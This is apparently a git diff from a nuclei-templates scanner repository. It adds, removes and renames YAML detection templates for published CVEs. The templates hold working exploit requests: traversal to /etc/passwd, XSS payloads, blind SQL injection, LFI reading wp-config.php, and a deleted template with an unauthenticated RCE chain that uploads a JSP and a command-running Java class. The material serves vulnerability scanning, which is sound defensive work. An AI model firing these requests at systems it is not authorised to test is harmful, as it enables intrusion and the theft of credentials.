100644 index 0af644b43a..0000000000 --- a/nuclei-templates/CVE-2018/CVE-2018-19753.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2018-19753 -info: - name: Tarantella Enterprise Directory Traversal - author: 0x_Akoko - severity: high - description: Tarantella Enterprise versions prior to 3.11 suffer from a directory traversal vulnerability. - reference: - - https://packetstormsecurity.com/files/150541/Tarantella-Enterprise-Directory-Traversal.html - - https://www.cvedetails.com/cve/CVE-2018-19753 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2018-19753 - cwe-id: CWE-22 - tags: cve,cve2018,tarantella,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-19914.yaml b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml new file mode 100644 index 0000000000..f74e59b810 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-19914.yaml @@ -0,0 +1,46 @@ +id: CVE-2018-19914 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field. + reference: + - https://www.exploit-db.com/exploits/46375/ + - https://github.com/domainmod/domainmod/issues/87 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-19914 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/dns.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_dns1=abc&new_ip1=&new_dns2=abc&new_ip2=&new_dns3=abc&new_ip3=&new_dns4=&new_ip4=&new_dns5=&new_ip5=&new_dns6=&new_ip6=&new_dns7=&new_ip7=&new_dns8=&new_ip8=&new_dns9=&new_ip9=&new_dns10=&new_ip10=&new_notes=%3Cscript%3Ealert%281%29%3C%2Fscript%3E + - | + GET /assets/dns.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-20009.yaml b/nuclei-templates/CVE-2018/CVE-2018-20009.yaml new file mode 100644 index 0000000000..e6a0801a38 --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-20009.yaml @@ -0,0 +1,47 @@ +id: CVE-2018-20009 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/ssl-provider.php ssl-provider-name, ssl-provider's-url parameters. + reference: + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20009 + - https://www.exploit-db.com/exploits/46372/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20009 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve2018,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/ssl-provider.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes= + - | + GET /assets/ssl-providers.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/CVE-2018-20011.yaml b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml new file mode 100644 index 0000000000..b48e1aa0cb --- /dev/null +++ b/nuclei-templates/CVE-2018/CVE-2018-20011.yaml @@ -0,0 +1,47 @@ +id: CVE-2018-20011 +info: + name: DomainMOD 4.11.01 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /assets/add/category.php CatagoryName, StakeHolder parameters. + reference: + - https://www.exploit-db.com/exploits/46374/ + - https://github.com/domainmod/domainmod/issues/88 + - https://nvd.nist.gov/vuln/detail/CVE-2018-20011 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.8 + cve-id: CVE-2018-20011 + cwe-id: CWE-79 + metadata: + verified: true + tags: cve,cve1028,domainmod,xss,authenticated +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + - | + POST /assets/add/category.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes= + - | + GET /assets/categories.php HTTP/1.1 + Host: {{Hostname}} + cookie-reuse: true + redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_3 == 200' + - 'contains(all_headers_3, "text/html")' + - 'contains(body_3, ">")' + condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-2893.yaml b/nuclei-templates/CVE-2018/CVE-2018-2893.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-2893.yaml rename to nuclei-templates/CVE-2018/CVE-2018-2893.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-2894.yaml b/nuclei-templates/CVE-2018/CVE-2018-2894.yaml similarity index 100% rename from nuclei-templates/CVE-2018/cve-2018-2894.yaml rename to nuclei-templates/CVE-2018/CVE-2018-2894.yaml diff --git a/nuclei-templates/CVE-2018/CVE-2018-5230.yaml b/nuclei-templates/CVE-2018/CVE-2018-5230.yaml index ec997e4f28..7501600a4f 100644 --- a/nuclei-templates/CVE-2018/CVE-2018-5230.yaml +++ b/nuclei-templates/CVE-2018/CVE-2018-5230.yaml @@ -1,5 +1,4 @@ id: CVE-2018-5230 - info: name: Atlassian Confluence Status-List XSS author: madrobot @@ -16,26 +15,22 @@ info: metadata: shodan-query: http.component:"Atlassian Confluence" tags: cve,cve2018,atlassian,confluence,xss - requests: - method: GET path: - "{{BaseURL}}/pages/includes/status-list-mo%3Ciframe%20src%3D%22javascript%3Aalert%28document.domain%29%22%3E.vm" - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: - '" - - "adsf/js/" - condition: and diff --git a/nuclei-templates/CVE-2021/CVE-2021-37589.yaml b/nuclei-templates/CVE-2021/CVE-2021-37589.yaml new file mode 100644 index 0000000000..f10ff799c2 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-37589.yaml @@ -0,0 +1,55 @@ +id: CVE-2021-37589 +info: + name: Virtua Software Cobranca <12R - Blind SQL Injection + author: princechaddha + severity: high + description: | + Virtua Cobranca before 12R allows blind SQL injection on the login page. + reference: + - https://github.com/luca-regne/my-cves/tree/main/CVE-2021-37589 + - https://www.virtuasoftware.com.br/ + - https://www.virtuasoftware.com.br/conteudo.php?content=downloads&lang=pt-br + - https://nvd.nist.gov/vuln/detail/CVE-2021-37589 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-37589 + cwe-id: CWE-89 + metadata: + shodan-query: http.favicon.hash:876876147 + verified: "true" + tags: cve,cve2021,virtua,sqli +requests: + - raw: + - | + POST /controller/origemdb.php?idselorigem=ATIVOS HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + - | + POST /controller/login.php?acao=autenticar HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + + idusuario='&idsenha=test&tipousr=Usuario + - | + POST /controller/login.php?acao=autenticar HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + + idusuario=''&idsenha=a&tipousr=Usuario + cookie-reuse: true + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_3, "Os parametros não estão informados corretamente")' + - 'contains(body_3, "O CNPJ dos parametro não está informado corretamente")' + condition: or + - type: dsl + dsl: + - "status_code_2 == 500 && status_code_3 == 200" + +# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-37704.yaml b/nuclei-templates/CVE-2021/CVE-2021-37704.yaml deleted file mode 100644 index c5f5f6eb0f..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-37704.yaml +++ /dev/null @@ -1,46 +0,0 @@ -id: CVE-2021-37704 - -info: - name: phpfastcache - phpinfo Resource Exposure - author: whoever - severity: medium - description: phpinfo() is susceptible to resource exposure in unprotected composer vendor folders via phpfastcache/phpfastcache. - reference: - - https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 - - https://github.com/PHPSocialNetwork/phpfastcache/security/advisories/GHSA-cvh5-p6r6-g2qc - - https://packagist.org/packages/phpfastcache/phpfastcache - - https://github.com/PHPSocialNetwork/phpfastcache/blob/master/CHANGELOG.md#807 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 - cve-id: CVE-2021-37704 - cwe-id: CWE-668 - tags: cve,cve2021,exposure,phpfastcache,phpinfo,phpsocialnetwork - -requests: - - method: GET - path: - - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php" - - "{{BaseURL}}/vendor/phpfastcache/phpfastcache/examples/phpinfo.php" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - words: - - "PHP Extension" - - "PHP Version" - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - '>PHP Version <\/td>([0-9.]+)' - -# Enhanced by mp on 2022/03/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-37833.yaml b/nuclei-templates/CVE-2021/CVE-2021-37833.yaml deleted file mode 100644 index d4af2272cc..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-37833.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2021-37833 - -info: - name: Hotel Druid 3.0.2 - Cross-Site Scripting - author: pikpikcu - severity: medium - description: Hotel Druid 3.0.2 contains a cross-site scripting vulnerability in multiple pages which allows for arbitrary execution of JavaScript commands. - reference: - - https://github.com/dievus/CVE-2021-37833 - - https://www.hoteldruid.com - - https://nvd.nist.gov/vuln/detail/CVE-2021-37833 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-37833 - cwe-id: CWE-79 - tags: cve,cve2021,hoteldruid,xss - -requests: - - method: GET - path: - - '{{BaseURL}}/visualizza_tabelle.php?anno=2021&tipo_tabella=prenotazioni&sel_tab_prenota=tutte&wo03b%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ew5px3=1' - - '{{BaseURL}}/storia_soldi.php?piu17%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ee3esq=1' - - '{{BaseURL}}/tabella.php?jkuh3%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Eyql8b=1' - - '{{BaseURL}}/crea_modelli.php?anno=2021&id_sessione=&fonte_dati_conn=attuali&T_PHPR_DB_TYPE=postgresql&T_PHPR_DB_NAME=%C2%9E%C3%A9e&T_PHPR_DB_HOST=localhost&T_PHPR_DB_PORT=5432&T_PHPR_DB_USER=%C2%9E%C3%A9e&T_PHPR_DB_PASS=%C2%9E%C3%A9e&T_PHPR_LOAD_EXT=NO&T_PHPR_TAB_PRE=%C2%9E%C3%A9e&anno_modello=2021&lingua_modello=en&cambia_frasi=SIipq85%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ef9xkbujgt24&form_availability_calendar_template=1' - - stop-at-first-match: true - matchers-condition: and - matchers: - - - type: word - words: - - '' - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/28 diff --git a/nuclei-templates/CVE-2021/cve-2021-38647.yaml b/nuclei-templates/CVE-2021/CVE-2021-38647.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-38647.yaml rename to nuclei-templates/CVE-2021/CVE-2021-38647.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-38702.yaml b/nuclei-templates/CVE-2021/CVE-2021-38702.yaml deleted file mode 100644 index 963ec25c42..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-38702.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: CVE-2021-38702 - -info: - name: Cyberoam NetGenie Cross-Site Scripting - author: geeknik - severity: medium - description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 are susceptible to reflected cross-site scripting via the 'u' parameter of ft.php. - reference: - - https://seclists.org/fulldisclosure/2021/Aug/20 - - https://nvd.nist.gov/vuln/detail/CVE-2021-38702 - - http://www.cyberoamworks.com/NetGenie-Home.asp - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-38702 - cwe-id: CWE-79 - tags: cve2021,cyberoam,netgenie,xss,router,seclists,cve - -requests: - - method: GET - path: - - "{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - type: word - words: - - "" - - - type: word - words: - - "text/html" - part: header - - - type: status - status: - - 200 - -# Enhanced by cs on 2022/04/01 diff --git a/nuclei-templates/CVE-2021/CVE-2021-39312.yaml b/nuclei-templates/CVE-2021/CVE-2021-39312.yaml deleted file mode 100644 index 02e3b11697..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39312.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2021-39312 -info: - name: WordPress True Ranker <2.2.4 - Local File Inclusion - author: DhiyaneshDK - severity: high - description: WordPress True Ranker before version 2.2.4 allows sensitive configuration files such as wp-config.php, to be accessed via the src parameter found in the ~/admin/vendor/datatables/examples/resources/examples.php file via local file inclusion. - reference: - - https://wpscan.com/vulnerability/d48e723c-e3d1-411e-ab8e-629fe1606c79 - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39312 - - https://plugins.trac.wordpress.org/browser/seo-local-rank/tags/2.2.2/admin/vendor/datatables/examples/resources/examples.php - - https://nvd.nist.gov/vuln/detail/CVE-2021-39312 - remediation: Fixed in version 2.2.4 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-39312 - cwe-id: CWE-22,CWE-22 - tags: cve,cve2021,lfi,wp,wordpress,wp-plugin,unauth,lfr -requests: - - raw: - - | - POST /wp-content/plugins/seo-local-rank/admin/vendor/datatables/examples/resources/examples.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - src=%2Fscripts%2Fsimple.php%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php - matchers-condition: and - matchers: - - type: word - part: body - words: - - "DB_NAME" - - "DB_PASSWORD" - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/cve-2021-39322.yaml b/nuclei-templates/CVE-2021/CVE-2021-39322.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39322.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39322.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-39327.yaml b/nuclei-templates/CVE-2021/CVE-2021-39327.yaml deleted file mode 100644 index 4f63002f43..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-39327.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2021-39327 - -info: - name: WordPress BulletProof Security 5.1 Information Disclosure - author: geeknik - severity: medium - description: The BulletProof Security WordPress plugin is vulnerable to sensitive information disclosure due to a file path disclosure in the publicly accessible ~/db_backup_log.txt file which grants attackers the full path of the site, in addition to the path of database backup files. This affects versions up to, and including, 5.1. - reference: - - https://packetstormsecurity.com/files/164420/wpbulletproofsecurity51-disclose.txt - - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39327 - - https://nvd.nist.gov/vuln/detail/CVE-2021-39327 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2021-39327 - cwe-id: CWE-200 - tags: exposure,packetstorm,cve,cve2021,wordpress - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/bps-backup/logs/db_backup_log.txt' - - '{{BaseURL}}/wp-content/plugins/bulletproof-security/admin/htaccess/db_backup_log.txt' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'BPS DB BACKUP LOG' - - '==================' - condition: and - - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'text/plain' - -# Enhanced by mp on 2022/03/23 diff --git a/nuclei-templates/CVE-2021/cve-2021-39350.yaml b/nuclei-templates/CVE-2021/CVE-2021-39350.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39350.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39350.yaml diff --git a/nuclei-templates/CVE-2021/cve-2021-39501.yaml b/nuclei-templates/CVE-2021/CVE-2021-39501.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-39501.yaml rename to nuclei-templates/CVE-2021/CVE-2021-39501.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40149.yaml b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml new file mode 100644 index 0000000000..22c1d83310 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-40149.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-40149 +info: + name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure + author: For3stCo1d + severity: high + description: | + Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability. + reference: + - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt + - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149 + classification: + cve-id: CVE-2021-40149 + metadata: + shodan-query: http.title:"Reolink" + verified: "true" + tags: cve,cve2021,reolink,camera,iot,exposure,unauth +requests: + - method: GET + path: + - "{{BaseURL}}/self.key" + matchers-condition: and + matchers: + - type: word + words: + - "-----BEGIN RSA PRIVATE KEY-----" + - "-----END RSA PRIVATE KEY----" + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/30 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40150.yaml b/nuclei-templates/CVE-2021/CVE-2021-40150.yaml deleted file mode 100644 index 7c25b1aef3..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40150.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: CVE-2021-40150 -info: - name: Reolink E1 Zoom Camera - Information Disclosure - author: For3stCo1d - severity: medium - description: | - The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. - An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations. - reference: - - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt - - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150 - classification: - cve-id: CVE-2021-40150 - metadata: - verified: true - shodan-query: http.title:"Reolink" - tags: cve,cve2021,reolink,camera,exposure,iot -requests: - - method: GET - path: - - "{{BaseURL}}/conf/nginx.conf" - matchers-condition: and - matchers: - - type: word - words: - - "server" - - "listen" - - "fastcgi" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/cve-2021-40438.yaml b/nuclei-templates/CVE-2021/CVE-2021-40438.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-40438.yaml rename to nuclei-templates/CVE-2021/CVE-2021-40438.yaml diff --git a/nuclei-templates/CVE-2021/CVE-2021-40539.yaml b/nuclei-templates/CVE-2021/CVE-2021-40539.yaml deleted file mode 100644 index a0ae656661..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40539.yaml +++ /dev/null @@ -1,116 +0,0 @@ -id: CVE-2021-40539 - -info: - name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution - author: daffainfo,pdteam - severity: critical - description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution. - reference: - - https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis - - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html - - https://github.com/synacktiv/CVE-2021-40539 - - https://nvd.nist.gov/vuln/detail/CVE-2021-40539 - remediation: Upgrade to ADSelfService Plus build 6114. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2021-40539 - cwe-id: CWE-287 - tags: cve,cve2021,rce,ad,intrusive,manageengine,cisa - -requests: - - - raw: - - | - POST /./RestAPI/LogonCustomization HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458 - - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="methodToCall" - - unspecified - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="Save" - - yes - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="form" - - smartcard - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="operation" - - Add - --8b1ab266c41afb773af2e064bc526458 - Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="ws.jsp" - - <%@ page import="java.util.*,java.io.*"%> - <%@ page import="java.security.MessageDigest"%> - <% - String cve = "CVE-2021-40539"; - MessageDigest alg = MessageDigest.getInstance("MD5"); - alg.reset(); - alg.update(cve.getBytes()); - byte[] digest = alg.digest(); - StringBuffer hashedpasswd = new StringBuffer(); - String hx; - for (int i=0;i - --8b1ab266c41afb773af2e064bc526458-- - - - | - POST /./RestAPI/LogonCustomization HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b - - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="methodToCall" - - unspecified - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="Save" - - yes - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="form" - - smartcard - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="operation" - - Add - --43992a07d9a30213782780204a9f032b - Content-Disposition: form-data; name="CERTIFICATE_PATH"; filename="Si.class" - - {{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}} - --43992a07d9a30213782780204a9f032b-- - - - | - POST /./RestAPI/Connection HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22 - - - | - GET /help/admin-guide/test.jsp HTTP/1.1 - Host: {{Hostname}} - - matchers-condition: and - matchers: - - - type: word - words: - - "114f7ce498a54a1be1de1f1e5731d0ea" # MD5 of CVE-2021-40539 - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/04/18 diff --git a/nuclei-templates/CVE-2021/CVE-2021-40875.yaml b/nuclei-templates/CVE-2021/CVE-2021-40875.yaml deleted file mode 100644 index 8aaaca1107..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-40875.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2021-40875 - -info: - name: Gurock TestRail Application files.md5 Exposure - author: oscarintherocks - severity: high - description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data. - reference: - - htttps://github.com/SakuraSamuraii/derailed - - https://johnjhacking.com/blog/cve-2021-40875/ - - https://www.gurock.com/testrail/tour/enterprise-edition - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2021-40875 - cwe-id: CWE-863 - metadata: - shodan-query: http.html:"TestRail" - tags: cve,cve2021,exposure,gurock,testrail - -requests: - - method: GET - path: - - "{{BaseURL}}/files.md5" - - "{{BaseURL}}/testrail/files.md5" - - max-size: 1000 # Define response size in bytes to read from server. - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "app/arguments/admin" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/CVE-2021-41174.yaml b/nuclei-templates/CVE-2021/CVE-2021-41174.yaml deleted file mode 100644 index 795471ebdc..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-41174.yaml +++ /dev/null @@ -1,51 +0,0 @@ -id: CVE-2021-41174 - -info: - name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting - author: pdteam - severity: medium - description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. - reference: - - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 - - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 - - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82 - - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912 - remediation: Upgrade to 8.2.3 or higher. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2021-41174 - cwe-id: CWE-79 - metadata: - shodan-query: title:"Grafana" - tags: cve,cve2021,grafana,xss - -requests: - - method: GET - path: - - "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1" - - skip-variables-check: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "Grafana" - - "frontend_boot_js_done_time_seconds" - condition: and - - - type: regex - regex: - - '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))' - - extractors: - - type: regex - group: 1 - regex: - - '"subTitle":"Grafana ([a-z0-9.]+)' - -# Enhanced by mp on 2022/03/06 diff --git a/nuclei-templates/CVE-2021/cve-2021-41192.yaml b/nuclei-templates/CVE-2021/CVE-2021-41192.yaml similarity index 100% rename from nuclei-templates/CVE-2021/cve-2021-41192.yaml rename to nuclei-templates/CVE-2021/CVE-2021-41192.yaml diff --git 